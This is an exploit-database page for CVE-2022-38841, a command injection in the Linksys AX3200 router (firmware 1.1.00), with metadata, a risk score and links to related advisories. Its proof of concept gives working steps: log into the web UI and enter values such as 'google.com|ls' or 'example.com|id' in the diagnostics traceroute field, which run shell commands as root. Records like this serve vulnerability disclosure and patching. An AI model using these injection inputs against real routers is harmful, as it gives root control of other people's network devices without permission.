Lucene search
Ahmed Alroky1337DAY-ID-38282HistoryMar 22, 2023 - 12:00 a.m.
Linksys AX3200 V1.1.00 - Command Injection Vulnerability
2023-03-2200:00:00
Ahmed Alroky
0day.today
181
linksys ax3200
command injection
vulnerability
authentication required
cve-2022-38841
windows
exploit
EPSS
0.013
Percentile
86.2%
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows
# Proof Of Concept:
1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user
Related
nvd
nvd
CVE-2022-38841
2023-04-16 02:15:08
exploitdb
exploitdb
Linksys AX3200 V1.1.00 - Command Injection
2023-03-22 00:00:00
cve
cve
CVE-2022-38841
2023-04-16 02:15:08
prion
prion
Command injection
2023-04-16 02:15:00
cvelist
cvelist
CVE-2022-38841
2023-04-16 00:00:00
packetstorm
packetstorm
Linksys AX3200 1.1.00 Command Injection
2023-03-24 00:00:00